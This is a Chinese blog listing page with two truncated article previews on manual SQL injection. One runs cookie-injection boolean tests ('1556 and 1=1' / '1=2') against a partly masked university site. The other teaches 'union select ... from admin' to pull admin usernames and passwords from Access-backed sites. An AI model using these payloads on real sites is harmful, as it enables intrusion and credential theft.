共 2 篇文章 |
|
清空地址栏,输入:javascript:alert(document.cookie=”id=”+escape(“1556 and 1=1”)),然后去掉?id=1556输入http://soft.XXXXX.edu.cn/list.asp,返回正常,得到页面如图二所示:再清空地址栏,输入:javascript:alert(document.cookie=“id=”+escape(“1556 and 1=2”))回车,然后输入:http://soft.XXXXX.edu.cn/list.asp,得到页... 阅806 转4 评0 公众公开 16-05-06 18:29 |
扔下工具,教你如何手工注入网站(access类型的)让我们扔下工具吧,来一次真正意义上的手工注入网站吧。对表名和列名的字段名中猜内容:方法:union select 1,2,3,4,5,6.....from admin (这里要猜表名admin的内容,就要看看第6步骤中的显位的数字是几,然后把它替换成username就行了,同理列名的字段名中的password也是这样猜内容的)如图:这... 阅1811 转23 评0 公众公开 16-05-06 17:54 |